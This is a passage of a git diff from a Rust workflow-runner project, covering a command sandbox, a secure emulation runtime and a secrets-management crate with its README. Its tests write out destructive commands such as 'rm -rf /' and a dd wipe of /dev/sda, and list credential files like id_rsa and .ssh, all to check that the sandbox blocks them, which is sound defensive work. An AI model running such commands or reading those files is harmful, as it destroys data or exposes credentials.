allowed_write_paths,
|
||||
allowed_commands,
|
||||
..Default::default()
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_dangerous_pattern_detection() {
|
||||
let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();
|
||||
|
||||
// Should block dangerous commands
|
||||
assert!(sandbox.validate_command("rm -rf /").is_err());
|
||||
assert!(sandbox
|
||||
.validate_command("dd if=/dev/zero of=/dev/sda")
|
||||
.is_err());
|
||||
assert!(sandbox.validate_command("sudo rm -rf /home").is_err());
|
||||
assert!(sandbox.validate_command("bash -c 'rm -rf /'").is_err());
|
||||
|
||||
// Should allow safe commands
|
||||
assert!(sandbox.validate_command("echo hello").is_ok());
|
||||
assert!(sandbox.validate_command("ls -la").is_ok());
|
||||
assert!(sandbox.validate_command("cargo build").is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_command_whitelist() {
|
||||
let config = create_strict_sandbox_config();
|
||||
let sandbox = Sandbox::new(config).unwrap();
|
||||
|
||||
// Should allow whitelisted commands
|
||||
assert!(sandbox.validate_command("echo hello").is_ok());
|
||||
assert!(sandbox.validate_command("ls").is_ok());
|
||||
|
||||
// Should block non-whitelisted commands
|
||||
assert!(sandbox.validate_command("git clone").is_err());
|
||||
assert!(sandbox.validate_command("cargo build").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_file_filtering() {
|
||||
let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();
|
||||
|
||||
// Should skip dangerous files
|
||||
assert!(sandbox.should_skip_file("id_rsa"));
|
||||
assert!(sandbox.should_skip_file(".ssh"));
|
||||
assert!(sandbox.should_skip_file("credentials"));
|
||||
|
||||
// Should allow safe files
|
||||
assert!(!sandbox.should_skip_file("Cargo.toml"));
|
||||
assert!(!sandbox.should_skip_file("README.md"));
|
||||
assert!(!sandbox.should_skip_file(".gitignore"));
|
||||
}
|
||||
}
|
||||
339
crates/runtime/src/secure_emulation.rs
Normal file
339
crates/runtime/src/secure_emulation.rs
Normal file
@@ -0,0 +1,339 @@
|
||||
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use crate::sandbox::{create_workflow_sandbox_config, Sandbox, SandboxConfig, SandboxError};
|
||||
use async_trait::async_trait;
|
||||
use std::path::Path;
|
||||
use wrkflw_logging;
|
||||
|
||||
/// Secure emulation runtime that uses sandboxing for safety
|
||||
pub struct SecureEmulationRuntime {
|
||||
sandbox: Sandbox,
|
||||
}
|
||||
|
||||
impl Default for SecureEmulationRuntime {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl SecureEmulationRuntime {
|
||||
/// Create a new secure emulation runtime with default workflow-friendly configuration
|
||||
pub fn new() -> Self {
|
||||
let config = create_workflow_sandbox_config();
|
||||
let sandbox = Sandbox::new(config).expect("Failed to create sandbox");
|
||||
|
||||
wrkflw_logging::info("🔒 Initialized secure emulation runtime with sandboxing");
|
||||
|
||||
Self { sandbox }
|
||||
}
|
||||
|
||||
/// Create a new secure emulation runtime with custom sandbox configuration
|
||||
pub fn new_with_config(config: SandboxConfig) -> Result<Self, ContainerError> {
|
||||
let sandbox = Sandbox::new(config).map_err(|e| {
|
||||
ContainerError::ContainerStart(format!("Failed to create sandbox: {}", e))
|
||||
})?;
|
||||
|
||||
wrkflw_logging::info("🔒 Initialized secure emulation runtime with custom config");
|
||||
|
||||
Ok(Self { sandbox })
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl ContainerRuntime for SecureEmulationRuntime {
|
||||
async fn run_container(
|
||||
&self,
|
||||
image: &str,
|
||||
command: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
_volumes: &[(&Path, &Path)],
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Executing sandboxed command: {} (image: {})",
|
||||
command.join(" "),
|
||||
image
|
||||
));
|
||||
|
||||
// Use sandbox to execute the command safely
|
||||
let result = self
|
||||
.sandbox
|
||||
.execute_command(command, env_vars, working_dir)
|
||||
.await;
|
||||
|
||||
match result {
|
||||
Ok(output) => {
|
||||
wrkflw_logging::info("✅ Sandboxed command completed successfully");
|
||||
Ok(output)
|
||||
}
|
||||
Err(SandboxError::BlockedCommand { command }) => {
|
||||
let error_msg = format!(
|
||||
"🚫 SECURITY BLOCK: Command '{}' is not allowed in secure emulation mode. \
|
||||
This command was blocked for security reasons. \
|
||||
If you need to run this command, please use Docker or Podman mode instead.",
|
||||
command
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::DangerousPattern { pattern }) => {
|
||||
let error_msg = format!(
|
||||
"🚫 SECURITY BLOCK: Dangerous command pattern detected: '{}'. \
|
||||
This command was blocked because it matches a known dangerous pattern. \
|
||||
Please review your workflow for potentially harmful commands.",
|
||||
pattern
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::ExecutionTimeout { seconds }) => {
|
||||
let error_msg = format!(
|
||||
"⏰ Command execution timed out after {} seconds. \
|
||||
Consider optimizing your command or increasing timeout limits.",
|
||||
seconds
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::PathAccessDenied { path }) => {
|
||||
let error_msg = format!(
|
||||
"🚫 Path access denied: '{}'. \
|
||||
The sandbox restricts file system access for security.",
|
||||
path
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::ResourceLimitExceeded { resource }) => {
|
||||
let error_msg = format!(
|
||||
"📊 Resource limit exceeded: {}. \
|
||||
Your command used too many system resources.",
|
||||
resource
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(e) => {
|
||||
let error_msg = format!("Sandbox execution failed: {}", e);
|
||||
wrkflw_logging::error(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Secure emulation: Pretending to pull image {}",
|
||||
image
|
||||
));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Secure emulation: Pretending to build image {} from {}",
|
||||
tag,
|
||||
dockerfile.display()
|
||||
));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn prepare_language_environment(
|
||||
&self,
|
||||
language: &str,
|
||||
version: Option<&str>,
|
||||
_additional_packages: Option<Vec<String>>,
|
||||
) -> Result<String, ContainerError> {
|
||||
// For secure emulation runtime, we'll use a simplified approach
|
||||
// that doesn't require building custom images
|
||||
let base_image = match language {
|
||||
"python" => version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v)),
|
||||
"node" => version.map_or("node:20-slim".to_string(), |v| format!("node:{}", v)),
|
||||
"java" => version.map_or("eclipse-temurin:17-jdk".to_string(), |v| {
|
||||
format!("eclipse-temurin:{}", v)
|
||||
}),
|
||||
"go" => version.map_or("golang:1.21-slim".to_string(), |v| format!("golang:{}", v)),
|
||||
"dotnet" => version.map_or("mcr.microsoft.com/dotnet/sdk:7.0".to_string(), |v| {
|
||||
format!("mcr.microsoft.com/dotnet/sdk:{}", v)
|
||||
}),
|
||||
"rust" => version.map_or("rust:latest".to_string(), |v| format!("rust:{}", v)),
|
||||
_ => {
|
||||
return Err(ContainerError::ContainerStart(format!(
|
||||
"Unsupported language: {}",
|
||||
language
|
||||
)))
|
||||
}
|
||||
};
|
||||
|
||||
// For emulation, we'll just return the base image
|
||||
// The actual package installation will be handled during container execution
|
||||
Ok(base_image)
|
||||
}
|
||||
}
|
||||
|
||||
/// Handle special actions in secure emulation mode
|
||||
pub async fn handle_special_action_secure(action: &str) -> Result<(), ContainerError> {
|
||||
// Extract owner, repo and version from the action
|
||||
let action_parts: Vec<&str> = action.split('@').collect();
|
||||
let action_name = action_parts[0];
|
||||
let action_version = if action_parts.len() > 1 {
|
||||
action_parts[1]
|
||||
} else {
|
||||
"latest"
|
||||
};
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Processing action in secure mode: {} @ {}",
|
||||
action_name, action_version
|
||||
));
|
||||
|
||||
// In secure mode, we're more restrictive about what actions we allow
|
||||
match action_name {
|
||||
// Core GitHub actions that are generally safe
|
||||
name if name.starts_with("actions/checkout") => {
|
||||
wrkflw_logging::info("✅ Checkout action - workspace files are prepared securely");
|
||||
}
|
||||
name if name.starts_with("actions/setup-node") => {
|
||||
wrkflw_logging::info("🟡 Node.js setup - using system Node.js in secure mode");
|
||||
check_command_available_secure("node", "Node.js", "https://nodejs.org/");
|
||||
}
|
||||
name if name.starts_with("actions/setup-python") => {
|
||||
wrkflw_logging::info("🟡 Python setup - using system Python in secure mode");
|
||||
check_command_available_secure("python", "Python", "https://www.python.org/downloads/");
|
||||
}
|
||||
name if name.starts_with("actions/setup-java") => {
|
||||
wrkflw_logging::info("🟡 Java setup - using system Java in secure mode");
|
||||
check_command_available_secure("java", "Java", "https://adoptium.net/");
|
||||
}
|
||||
name if name.starts_with("actions/cache") => {
|
||||
wrkflw_logging::info("🟡 Cache action - caching disabled in secure emulation mode");
|
||||
}
|
||||
|
||||
// Rust-specific actions
|
||||
name if name.starts_with("actions-rs/cargo") => {
|
||||
wrkflw_logging::info("🟡 Rust cargo action - using system Rust in secure mode");
|
||||
check_command_available_secure("cargo", "Rust/Cargo", "https://rustup.rs/");
|
||||
}
|
||||
name if name.starts_with("actions-rs/toolchain") => {
|
||||
wrkflw_logging::info("🟡 Rust toolchain action - using system Rust in secure mode");
|
||||
check_command_available_secure("rustc", "Rust", "https://rustup.rs/");
|
||||
}
|
||||
name if name.starts_with("actions-rs/fmt") => {
|
||||
wrkflw_logging::info("🟡 Rust formatter action - using system rustfmt in secure mode");
|
||||
check_command_available_secure("rustfmt", "rustfmt", "rustup component add rustfmt");
|
||||
}
|
||||
|
||||
// Potentially dangerous actions that we warn about
|
||||
name if name.contains("docker") || name.contains("container") => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 Docker/container action '{}' is not supported in secure emulation mode. \
|
||||
Use Docker or Podman mode for container actions.",
|
||||
action_name
|
||||
));
|
||||
}
|
||||
name if name.contains("ssh") || name.contains("deploy") => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 SSH/deployment action '{}' is restricted in secure emulation mode. \
|
||||
Use Docker or Podman mode for deployment actions.",
|
||||
action_name
|
||||
));
|
||||
}
|
||||
|
||||
// Unknown actions
|
||||
_ => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🟡 Unknown action '{}' in secure emulation mode. \
|
||||
Some functionality may be limited or unavailable.",
|
||||
action_name
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Check if a command is available, with security-focused messaging
|
||||
fn check_command_available_secure(command: &str, name: &str, install_url: &str) {
|
||||
use std::process::Command;
|
||||
|
||||
let is_available = Command::new("which")
|
||||
.arg(command)
|
||||
.output()
|
||||
.map(|output| output.status.success())
|
||||
.unwrap_or(false);
|
||||
|
||||
if !is_available {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🔧 {} is required but not found on the system",
|
||||
name
|
||||
));
|
||||
wrkflw_logging::info(&format!(
|
||||
"To use this action in secure mode, please install {}: {}",
|
||||
name, install_url
|
||||
));
|
||||
wrkflw_logging::info(&format!(
|
||||
"Alternatively, use Docker or Podman mode for automatic {} installation",
|
||||
name
|
||||
));
|
||||
} else {
|
||||
// Try to get version information
|
||||
if let Ok(output) = Command::new(command).arg("--version").output() {
|
||||
if output.status.success() {
|
||||
let version = String::from_utf8_lossy(&output.stdout);
|
||||
wrkflw_logging::info(&format!(
|
||||
"✅ Using system {} in secure mode: {}",
|
||||
name,
|
||||
version.trim()
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use crate::sandbox::create_strict_sandbox_config;
|
||||
use std::path::PathBuf;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secure_emulation_blocks_dangerous_commands() {
|
||||
let config = create_strict_sandbox_config();
|
||||
let runtime = SecureEmulationRuntime::new_with_config(config).unwrap();
|
||||
|
||||
// Should block dangerous commands
|
||||
let result = runtime
|
||||
.run_container(
|
||||
"alpine:latest",
|
||||
&["rm", "-rf", "/"],
|
||||
&[],
|
||||
&PathBuf::from("."),
|
||||
&[],
|
||||
)
|
||||
.await;
|
||||
|
||||
assert!(result.is_err());
|
||||
let error_msg = result.unwrap_err().to_string();
|
||||
assert!(error_msg.contains("SECURITY BLOCK"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secure_emulation_allows_safe_commands() {
|
||||
let runtime = SecureEmulationRuntime::new();
|
||||
|
||||
// Should allow safe commands
|
||||
let result = runtime
|
||||
.run_container(
|
||||
"alpine:latest",
|
||||
&["echo", "hello world"],
|
||||
&[],
|
||||
&PathBuf::from("."),
|
||||
&[],
|
||||
)
|
||||
.await;
|
||||
|
||||
assert!(result.is_ok());
|
||||
let output = result.unwrap();
|
||||
assert!(output.stdout.contains("hello world"));
|
||||
assert_eq!(output.exit_code, 0);
|
||||
}
|
||||
}
|
||||
61
crates/secrets/Cargo.toml
Normal file
61
crates/secrets/Cargo.toml
Normal file
@@ -0,0 +1,61 @@
|
||||
[package]
|
||||
name = "wrkflw-secrets"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Secrets management for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# External dependencies
|
||||
serde.workspace = true
|
||||
serde_json.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
tokio.workspace = true
|
||||
thiserror.workspace = true
|
||||
dirs.workspace = true
|
||||
regex.workspace = true
|
||||
lazy_static.workspace = true
|
||||
chrono = { workspace = true, features = ["serde"] }
|
||||
async-trait.workspace = true
|
||||
|
||||
# Dependencies not in workspace
|
||||
anyhow = "1.0"
|
||||
base64 = "0.21"
|
||||
aes-gcm = "0.10"
|
||||
rand = "0.8"
|
||||
tracing = "0.1"
|
||||
url = "2.4"
|
||||
pbkdf2 = "0.12"
|
||||
hmac = "0.12"
|
||||
sha2 = "0.10"
|
||||
|
||||
# Optional dependencies for different secret providers (commented out for compatibility)
|
||||
# reqwest = { version = "0.11", features = ["json"], optional = true }
|
||||
# aws-sdk-secretsmanager = { version = "1.0", optional = true }
|
||||
# azure_security_keyvault = { version = "0.16", optional = true }
|
||||
|
||||
[features]
|
||||
default = ["env-provider", "file-provider"]
|
||||
env-provider = []
|
||||
file-provider = []
|
||||
# Cloud provider features are planned for future implementation
|
||||
# vault-provider = ["reqwest"]
|
||||
# aws-provider = ["aws-sdk-secretsmanager", "reqwest"]
|
||||
# azure-provider = ["azure_security_keyvault", "reqwest"]
|
||||
# gcp-provider = ["reqwest"]
|
||||
# all-providers = ["vault-provider", "aws-provider", "azure-provider", "gcp-provider"]
|
||||
|
||||
[dev-dependencies]
|
||||
tempfile.workspace = true
|
||||
tokio-test = "0.4"
|
||||
uuid.workspace = true
|
||||
criterion = { version = "0.5", features = ["html_reports"] }
|
||||
|
||||
[[bench]]
|
||||
name = "masking_bench"
|
||||
harness = false
|
||||
387
crates/secrets/README.md
Normal file
387
crates/secrets/README.md
Normal file
@@ -0,0 +1,387 @@
|
||||
# wrkflw-secrets
|
||||
|
||||
Comprehensive secrets management for wrkflw workflow execution. This crate provides secure handling of secrets with support for multiple providers, encryption, masking, and GitHub Actions-compatible variable substitution.
|
||||
|
||||
## Features
|
||||
|
||||
- **Multiple Secret Providers**: Environment variables, files, HashiCorp Vault, AWS Secrets Manager, Azure Key Vault, Google Cloud Secret Manager
|
||||
- **Secure Storage**: AES-256-GCM encryption for secrets at rest
|
||||
- **Variable Substitution**: GitHub Actions-compatible `${{ secrets.* }}` syntax
|
||||
- **Secret Masking**: Automatic masking of secrets in logs and output with pattern detection
|
||||
- **Caching**: Optional caching with TTL for performance optimization
|
||||
- **Rate Limiting**: Built-in protection against secret access abuse
|
||||
- **Input Validation**: Comprehensive validation of secret names and values
|
||||
- **Health Checks**: Provider health monitoring and diagnostics
|
||||
- **Configuration**: Flexible YAML/JSON configuration with environment variable support
|
||||
- **Thread Safety**: Full async/await support with concurrent access
|
||||
- **Performance Optimized**: Compiled regex patterns and caching for high-throughput scenarios
|
||||
|
||||
## Quick Start
|
||||
|
||||
```rust
|
||||
use wrkflw_secrets::prelude::*;
|
||||
|
||||
#[tokio::main]
|
||||
async fn main() -> SecretResult<()> {
|
||||
// Create a secret manager with default configuration
|
||||
let manager = SecretManager::default().await?;
|
||||
|
||||
// Set an environment variable
|
||||
std::env::set_var("GITHUB_TOKEN", "ghp_your_token_here");
|
||||
|
||||
// Get a secret
|
||||
let secret = manager.get_secret("GITHUB_TOKEN").await?;
|
||||
println!("Token: {}", secret.value());
|
||||
|
||||
// Use secret substitution
|
||||
let mut substitution = SecretSubstitution::new(&manager);
|
||||
let template = "curl -H 'Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}' https://api.github.com";
|
||||
let resolved = substitution.substitute(template).await?;
|
||||
|
||||
// Mask secrets in logs
|
||||
let mut masker = SecretMasker::new();
|
||||
masker.add_secret(secret.value());
|
||||
let safe_log = masker.mask(&resolved);
|
||||
println!("Safe log: {}", safe_log);
|
||||
|
||||
Ok(())
|
||||
}
|
||||
```
|
||||
|
||||
## Configuration
|
||||
|
||||
### Environment Variables
|
||||
|
||||
```bash
|
||||
# Set default provider
|
||||
export WRKFLW_DEFAULT_SECRET_PROVIDER=env
|
||||
|
||||
# Enable/disable secret masking
|
||||
export WRKFLW_SECRET_MASKING=true
|
||||
|
||||
# Set operation timeout
|
||||
export WRKFLW_SECRET_TIMEOUT=30
|
||||
```
|
||||
|
||||
### Configuration File
|
||||
|
||||
Create `~/.wrkflw/secrets.yml`:
|
||||
|
||||
```yaml
|
||||
default_provider: env
|
||||
enable_masking: true
|
||||
timeout_seconds: 30
|
||||
enable_caching: true
|
||||
cache_ttl_seconds: 300
|
||||
|
||||
providers:
|
||||
env:
|
||||
type: environment
|
||||
prefix: "WRKFLW_SECRET_"
|
||||
|
||||
file:
|
||||
type: file
|
||||
path: "~/.wrkflw/secrets.json"
|
||||
|
||||
vault:
|
||||
type: vault
|
||||
url: "https://vault.example.com"
|
||||
auth:
|
||||
method: token
|
||||
token: "${VAULT_TOKEN}"
|
||||
mount_path: "secret"
|
||||
```
|
||||
|
||||
## Secret Providers
|
||||
|
||||
### Environment Variables
|
||||
|
||||
The simplest provider reads secrets from environment variables:
|
||||
|
||||
```rust
|
||||
// With prefix
|
||||
std::env::set_var("WRKFLW_SECRET_API_KEY", "secret_value");
|
||||
let secret = manager.get_secret_from_provider("env", "API_KEY").await?;
|
||||
|
||||
// Without prefix
|
||||
std::env::set_var("GITHUB_TOKEN", "ghp_token");
|
||||
let secret = manager.get_secret_from_provider("env", "GITHUB_TOKEN").await?;
|
||||
```
|
||||
|
||||
### File-based Storage
|
||||
|
||||
Store secrets in JSON, YAML, or environment files:
|
||||
|
||||
**JSON format** (`secrets.json`):
|
||||
```json
|
||||
{
|
||||
"API_KEY": "secret_api_key",
|
||||
"DB_PASSWORD": "secret_password"
|
||||
}
|
||||
```
|
||||
|
||||
**Environment format** (`secrets.env`):
|
||||
```bash
|
||||
API_KEY=secret_api_key
|
||||
DB_PASSWORD="quoted password"
|
||||
GITHUB_TOKEN='single quoted token'
|
||||
```
|
||||
|
||||
**YAML format** (`secrets.yml`):
|
||||
```yaml
|
||||
API_KEY: secret_api_key
|
||||
DB_PASSWORD: secret_password
|
||||
```
|
||||
|
||||
### HashiCorp Vault
|
||||
|
||||
```yaml
|
||||
providers:
|
||||
vault:
|
||||
type: vault
|
||||
url: "https://vault.example.com"
|
||||
auth:
|
||||
method: token
|
||||
token: "${VAULT_TOKEN}"
|
||||
mount_path: "secret"
|
||||
```
|
||||
|
||||
### AWS Secrets Manager
|
||||
|
||||
```yaml
|
||||
providers:
|
||||
aws:
|
||||
type: aws_secrets_manager
|
||||
region: "us-east-1"
|
||||
role_arn: "arn:aws:iam::123456789012:role/SecretRole" # optional
|
||||
```
|
||||
|
||||
### Azure Key Vault
|
||||
|
||||
```yaml
|
||||
providers:
|
||||
azure:
|
||||
type: azure_key_vault
|
||||
vault_url: "https://myvault.vault.azure.net/"
|
||||
auth:
|
||||
method: service_principal
|
||||
client_id: "${AZURE_CLIENT_ID}"
|
||||
client_secret: "${AZURE_CLIENT_SECRET}"
|
||||
tenant_id: "${AZURE_TENANT_ID}"
|
||||
```
|
||||
|
||||
### Google Cloud Secret Manager
|
||||
|
||||
```yaml
|
||||
providers:
|
||||
gcp:
|
||||
type: gcp_secret_manager
|
||||
project_id: "my-project"
|
||||
key_file: "/path/to/service-account.json" # optional
|
||||
```
|
||||
|
||||
## Variable Substitution
|
||||
|
||||
Support for GitHub Actions-compatible secret references:
|
||||
|
||||
```rust
|
||||
let mut substitution = SecretSubstitution::new(&manager);
|
||||
|
||||
// Default provider
|
||||
let template = "TOKEN=${{ secrets.GITHUB_TOKEN }}";
|
||||
let resolved = substitution.substitute(template).await?;
|
||||
|
||||
// Specific provider
|
||||
let template = "API_KEY=${{ secrets.vault:API_KEY }}";
|
||||
let resolved = substitution.substitute(template).await?;
|
||||
```
|
||||
|
||||
## Secret Masking
|
||||
|
||||
Automatically mask secrets in logs and output:
|
||||
|
||||
```rust
|
||||
let mut masker = SecretMasker::new();
|
||||
|
||||
// Add specific secrets
|
||||
masker.add_secret("secret_value");
|
||||
|
||||
// Automatic pattern detection for common secret types
|
||||
let log = "Token: ghp_1234567890123456789012345678901234567890";
|
||||
let masked = masker.mask(log);
|
||||
// Output: "Token: ghp_***"
|
||||
```
|
||||
|
||||
Supported patterns:
|
||||
- GitHub Personal Access Tokens (`ghp_*`)
|
||||
- GitHub App tokens (`ghs_*`)
|
||||
- GitHub OAuth tokens (`gho_*`)
|
||||
- AWS Access Keys (`AKIA*`)
|
||||
- JWT tokens
|
||||
- Generic API keys
|
||||
|
||||
## Encrypted Storage
|
||||
|
||||
For sensitive environments, use encrypted storage:
|
||||
|
||||
```rust
|
||||
use wrkflw_secrets::storage::{EncryptedSecretStore, KeyDerivation};
|
||||
|
||||
// Create encrypted store
|
||||
let (mut store, key) = EncryptedSecretStore::new()?;
|
||||
|
||||
// Add secrets
|
||||
store.add_secret(&key, "API_KEY", "secret_value")?;
|
||||
|
||||
// Save to file
|
||||
store.save_to_file("secrets.encrypted").await?;
|
||||
|
||||
// Load from file
|
||||
let loaded_store = EncryptedSecretStore::load_from_file("secrets.encrypted").await?;
|
||||
let secret = loaded_store.get_secret(&key, "API_KEY")?;
|
||||
```
|
||||
|
||||
## Error Handling
|
||||
|
||||
All operations return `SecretResult<T>` with comprehensive error types:
|
||||
|
||||
```rust
|
||||
match manager.get_secret("MISSING_SECRET").await {
|
||||
Ok(secret) => println!("Secret: {}", secret.value()),
|
||||
Err(SecretError::NotFound { name }) => {
|
||||
eprintln!("Secret '{}' not found", name);
|
||||
}
|
||||
Err(SecretError::ProviderNotFound { provider }) => {
|
||||
eprintln!("Provider '{}' not configured", provider);
|
||||
}
|
||||
Err(SecretError::AuthenticationFailed { provider, reason }) => {
|
||||
eprintln!("Auth failed for {}: {}", provider, reason);
|
||||
}
|
||||
Err(e) => eprintln!("Error: {}", e),
|
||||
}
|
||||
```
|
||||
|
||||
## Health Checks
|
||||
|
||||
Monitor provider health:
|
||||
|
||||
```rust
|
||||
let health_results = manager.health_check().await;
|
||||
for (provider, result) in health_results {
|
||||
match result {
|
||||
Ok(()) => println!("✓ {} is healthy", provider),
|
||||
Err(e) => println!("✗ {} failed: {}", provider, e),
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Security Best Practices
|
||||
|
||||
1. **Use encryption** for secrets at rest
|
||||
2. **Enable masking** to prevent secrets in logs
|
||||
3. **Rotate secrets** regularly
|
||||
4. **Use least privilege** access for secret providers
|
||||
5. **Monitor access** through health checks and logging
|
||||
6. **Use provider-specific authentication** (IAM roles, service principals)
|
||||
7. **Configure rate limiting** to prevent abuse
|
||||
8. **Validate input** - the system automatically validates secret names and values
|
||||
|
||||
## Rate Limiting
|
||||
|
||||
Protect against abuse with built-in rate limiting:
|
||||
|
||||
```rust
|
||||
use wrkflw_secrets::rate_limit::RateLimitConfig;
|
||||
use std::time::Duration;
|
||||
|
||||
let mut config = SecretConfig::default();
|
||||
config.rate_limit = RateLimitConfig {
|
||||
max_requests: 100, // Max requests per window
|
||||
window_duration: Duration::from_secs(60), // 1 minute window
|
||||
enabled: true,
|
||||
};
|
||||
|
||||
let manager = SecretManager::new(config).await?;
|
||||
|
||||
// Rate limiting is automatically applied to all secret access operations
|
||||
match manager.get_secret("API_KEY").await {
|
||||
Ok(secret) => println!("Success: {}", secret.value()),
|
||||
Err(SecretError::RateLimitExceeded(msg)) => {
|
||||
println!("Rate limited: {}", msg);
|
||||
}
|
||||
Err(e) => println!("Other error: {}", e),
|
||||
}
|
||||
```
|
||||
|
||||
## Input Validation
|
||||
|
||||
All inputs are automatically validated:
|
||||
|
||||
```rust
|
||||
// Secret names must:
|
||||
// - Be 1-255 characters long
|
||||
// - Contain only letters, numbers, underscores, hyphens, and dots
|
||||
// - Not start or end with dots
|
||||
// - Not contain consecutive dots
|
||||
// - Not be reserved system names
|
||||
|
||||
// Secret values must:
|
||||
// - Be under 1MB in size
|
||||
// - Not contain null bytes
|
||||
// - Be valid UTF-8
|
||||
|
||||
// Invalid examples that will be rejected:
|
||||
manager.get_secret("").await; // Empty name
|
||||
manager.get_secret("invalid/name").await; // Invalid characters
|
||||
manager.get_secret(".hidden").await; // Starts with dot
|
||||
manager.get_secret("CON").await; // Reserved name
|
||||
```
|
||||
|
||||
## Performance Features
|
||||
|
||||
### Caching
|
||||
|
||||
```rust
|
||||
let config = SecretConfig {
|
||||
enable_caching: true,
|
||||
cache_ttl_seconds: 300, // 5 minutes
|
||||
..Default::default()
|
||||
};
|
||||
```
|
||||
|
||||
### Optimized Pattern Matching
|
||||
|
||||
- Pre-compiled regex patterns for secret detection
|
||||
- Global pattern cache using `OnceLock`
|
||||
- Efficient string replacement algorithms
|
||||
- Cached mask generation
|
||||
|
||||
### Benchmarking
|
||||
|
||||
Run performance benchmarks:
|
||||
|
||||
```bash
|
||||
cargo bench -p wrkflw-secrets
|
||||
```
|
||||
|
||||
## Feature Flags
|
||||
|
||||
Enable optional providers:
|
||||
|
||||
```toml
|
||||
[dependencies]
|
||||
wrkflw-secrets = { version = "0.1", features = ["vault-provider", "aws-provider"] }
|
||||
```
|
||||
|
||||
Available features:
|
||||
- `env-provider` (default)
|
||||
- `file-provider` (default)
|
||||
- `vault-provider`
|
||||
- `aws-provider`
|
||||
- `azure-provider`
|
||||
- `gcp-provider`
|
||||
- `all-providers`
|
||||
|
||||
## License
|
||||
|
||||
MIT License - see LICENSE file for details.
|
||||
92
crates/secrets/benches/masking_bench.rs
Normal file
92
crates/secrets/benches/masking_bench.rs
Normal file
@@ -0,0 +1,92 @@
|
||||
// Copyright 2024 wrkflw contributors
|
||||
// SPDX-License-Identifier: MIT
|
||||
|
||||
//! Benchmarks for secret masking performance
|
||||
|
||||
use criterion::{black_box, criterion_group, criterion_main, Criterion};
|
||||
use wrkflw_secrets::SecretMasker;
|
||||
|
||||
fn bench_basic_masking(c: &mut Criterion) {
|
||||
let mut masker = SecretMasker::new();
|
||||
masker.add_secret("password123");
|
||||
masker.add_secret("api_key_abcdef123456");
|
||||
masker.add_secret("super_secret_value_that_should_be_masked");
|
||||
|
||||
let text = "The password is password123 and the API key is api_key_abcdef123456. Also super_secret_value_that_should_be_masked is here.";
|
||||
|
||||
c.bench_function("basic_masking", |b| b.iter(|| masker.mask(black_box(text))));
|
||||
}
|
||||
|
||||
fn bench_pattern_masking(c: &mut Criterion) {
|
||||
let masker = SecretMasker::new();
|
||||
|
||||
let text = "GitHub token: ghp_1234567890123456789012345678901234567890 and AWS key: AKIAIOSFODNN7EXAMPLE";
|
||||
|
||||
c.bench_function("pattern_masking", |b| {
|
||||
b.iter(|| masker.mask(black_box(text)))
|
||||
});
|
||||
}
|
||||
|
||||
fn bench_large_text_masking(c: &mut Criterion) {
|
||||
let mut masker = SecretMasker::new();
|
||||
masker.add_secret("secret123");
|
||||
masker.add_secret("password456");
|
||||
|
||||
// Create a large text with secrets scattered throughout
|
||||
let mut large_text = String::new();
|
||||
for i in 0..1000 {
|
||||
large_text.push_str(&format!(
|
||||
"Line {}: Some normal text here with secret123 and password456 mixed in. ",
|
||||
i
|
||||
));
|
||||
}
|
||||
|
||||
c.bench_function("large_text_masking", |b| {
|
||||
b.iter(|| masker.mask(black_box(&large_text)))
|
||||
});
|
||||
}
|
||||
|
||||
fn bench_many_secrets(c: &mut Criterion) {
|
